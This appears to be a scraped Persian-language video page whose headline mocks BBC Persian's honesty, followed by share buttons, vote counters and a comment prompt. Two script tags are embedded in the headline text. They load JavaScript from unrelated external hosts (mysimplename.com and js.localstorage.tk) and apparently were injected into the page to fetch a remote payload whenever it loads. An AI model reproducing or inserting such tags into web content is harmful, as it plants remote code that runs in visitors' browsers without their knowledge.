صداقت bbc فارسی از زبان ضد انقلاب !


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>گزارش جذاب و قابل تامل درباره "BBC"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)